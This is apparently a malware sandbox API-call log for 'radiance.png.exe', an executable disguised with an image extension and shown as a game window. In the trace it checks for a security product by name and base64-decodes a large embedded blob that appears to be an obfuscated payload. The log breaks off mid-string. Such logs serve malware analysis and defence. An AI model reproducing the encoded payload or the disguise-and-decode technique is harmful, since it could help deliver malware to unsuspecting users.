# Flog Txt Version 1
# Analyzer Version: 3.0.2
# Analyzer Build Date: May 15 2019 17:28:40
# Log Creation Date: 16.05.2019 17:08:00.362

Process:
	id = "1"
	image_name = "radiance.png.exe"
	filename = "c:\\users\\2xc7u663gxwc\\desktop\\radiance.png.exe"
	page_root = "0x7ee17480"
	os_pid = "0xd50"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	cur_dir = "C:\\Users\\2XC7u663GxWc\\Desktop\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1
	os_tid = 0xd54

	[0019.658] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0019.660] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0019.661] GetEnvironmentStrings () returned 0x17f990*
	[0019.661] GetCommandLineA () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0019.661] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0019.661] GetProcAddress (hModule=0x400000, lpProcName="___CPPdebugHook") returned 0x40e13c
	[0019.661] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0019.661] GetProcAddress (hModule=0x400000, lpProcName="___CPPdebugHook") returned 0x40e13c
	[0019.661] GetACP () returned 0x4e4
	[0019.661] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12ff14 | out: lpCPInfo=0x12ff14) returned 1
	[0019.661] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76b10000
	[0019.661] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0019.661] GetProcAddress (hModule=0x76b10000, lpProcName="Borland32") returned 0x0
	[0019.661] GetVersionExA (in: lpVersionInformation=0x12fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x12fde8, dwMinorVersion=0x0, dwBuildNumber=0x12ff78, dwPlatformId=0x7734e0ed, szCSDVersion="i\x9eÝ") | out: lpVersionInformation=0x12fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0019.662] GlobalMemoryStatus (in: lpBuffer=0x12feb4 | out: lpBuffer=0x12feb4) 
	[0019.678] VirtualAlloc (lpAddress=0x0, dwSize=0x400000, flAllocationType=0x2000, flProtect=0x1) returned 0x1240000
	[0019.678] VirtualAlloc (lpAddress=0x1240000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1240000
	[0019.678] VirtualAlloc (lpAddress=0x1241000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1241000
	[0019.679] VirtualAlloc (lpAddress=0x1242000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1242000
	[0019.679] VirtualAlloc (lpAddress=0x1243000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1243000
	[0019.679] VirtualAlloc (lpAddress=0x1244000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1244000
	[0019.679] VirtualAlloc (lpAddress=0x1245000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1245000
	[0019.679] VirtualAlloc (lpAddress=0x1246000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1246000
	[0019.679] VirtualAlloc (lpAddress=0x1247000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1247000
	[0019.679] VirtualAlloc (lpAddress=0x1248000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1248000
	[0019.679] VirtualAlloc (lpAddress=0x1249000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x1249000
	[0019.679] VirtualAlloc (lpAddress=0x124a000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x124a000
	[0019.679] VirtualAlloc (lpAddress=0x124b000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x124b000
	[0019.679] VirtualAlloc (lpAddress=0x124c000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x124c000
	[0019.679] VirtualAlloc (lpAddress=0x124d000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x124d000
	[0019.679] VirtualAlloc (lpAddress=0x124e000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x124e000
	[0019.680] VirtualAlloc (lpAddress=0x124f000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x124f000
	[0019.680] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12420a0, nSize=0xff | out: lpFilename="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe" (normalized: "c:\\users\\2xc7u663gxwc\\desktop\\radiance.png.exe")) returned 0x2e
	[0019.680] SetHandleCount (uNumber=0x32) returned 0x32
	[0019.680] GetStartupInfoA (in: lpStartupInfo=0x12fee4 | out: lpStartupInfo=0x12fee4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) 
	[0019.680] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0019.680] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0019.680] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0019.680] GetFileType (hFile=0x0) returned 0x0
	[0019.680] GetFileType (hFile=0x0) returned 0x0
	[0019.680] GetFileType (hFile=0x0) returned 0x0
	[0019.680] GetStartupInfoA (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) 
	[0019.680] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
	[0019.680] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
	[0019.681] LoadIconA (hInstance=0x400000, lpIconName=0x71) returned 0x0
	[0019.681] RegisterClassA (lpWndClass=0x12fe9c) returned 0xc07a
	[0019.681] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x72, hWndParent=0x0, lpDialogFunc=0x40308c, dwInitParam=0x0) returned 0xffffffff
	[0019.681] AdjustWindowRect (in: lpRect=0x12fe70, dwStyle=0xa0000, bMenu=0 | out: lpRect=0x12fe70) returned 1
	[0020.030] CreateWindowExA (dwExStyle=0x0, lpClassName="Squirrel Shootout by Brenton Andrew Saunders", lpWindowName="Squirrel Shootout by Brenton Andrew Saunders", dwStyle=0xa0000, X=-2147483648, Y=-2147483648, nWidth=576, nHeight=576, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x30132
	[0020.031] DefWindowProcA (hWnd=0x30132, Msg=0x24, wParam=0x0, lParam=0x12fa40) returned 0x0
	[0020.031] DefWindowProcA (hWnd=0x30132, Msg=0x81, wParam=0x0, lParam=0x12fa04) returned 0x1
	[0020.032] DefWindowProcA (hWnd=0x30132, Msg=0x83, wParam=0x0, lParam=0x12fa60) returned 0x0
	[0020.145] timeGetTime () returned 0xa5faf3
	[0020.145] GetClientRect (in: hWnd=0x30132, lpRect=0x43d8d0 | out: lpRect=0x43d8d0) returned 1
	[0020.145] GetDC (hWnd=0x30132) returned 0xf010174
	[0020.145] CreateCompatibleDC (hdc=0x0) returned 0x150101a2
	[0020.145] CreateCompatibleDC (hdc=0xf010174) returned 0xd01018b
	[0020.145] CreateCompatibleBitmap (hdc=0xf010174, cx=570, cy=548) returned 0x1405016c
	[0020.150] LoadBitmapA (hInstance=0x400000, lpBitmapName=0x6f) returned 0x0
	[0020.151] CreateFontA (cHeight=48, cWidth=0, cEscapement=0, cOrientation=0, cWeight=600, bItalic=0x0, bUnderline=0x0, bStrikeOut=0x0, iCharSet=0x1, iOutPrecision=0x2, iClipPrecision=0x1, iQuality=0x0, iPitchAndFamily=0x0, pszFaceName="Comic Sans MS") returned 0xd0a0186
	[0020.151] SelectObject (hdc=0xd01018b, h=0xd0a0186) returned 0x18a002e
	[0020.151] SetTextColor (hdc=0xd01018b, color=0xff0000) returned 0x0
	[0020.151] SetBkMode (hdc=0xd01018b, mode=1) returned 2
	[0020.151] SelectObject (hdc=0xd01018b, h=0x1405016c) returned 0x185000f
	[0020.151] GetStockObject (i=0) returned 0x1900010
	[0020.151] FillRect (hDC=0xf010174, lprc=0x43d8d0, hbr=0x1900010) returned 1
	[0020.151] GetKeyState (nVirtKey=144) returned 1
	[0020.151] SetTimer (hWnd=0x30132, nIDEvent=0x1, uElapse=0x1, lpTimerFunc=0x0) returned 0x1
	[0020.151] SetTimer (hWnd=0x30132, nIDEvent=0x2, uElapse=0x32, lpTimerFunc=0x0) returned 0x2
	[0020.151] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0020.151] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0020.565] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0020.565] CryptStringToBinaryA (in: pszString="nVjayBLYXNwZXJza3k=", cchString=0x13, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fed0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fed0, pdwSkip=0x0, pdwFlags=0x0) returned 0
	[0020.566] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0020.566] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0020.566] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0020.566] CryptStringToBinaryA (in: pszString="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", cchString=0x1ac0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0020.566] CryptStringToBinaryA (in: pszString="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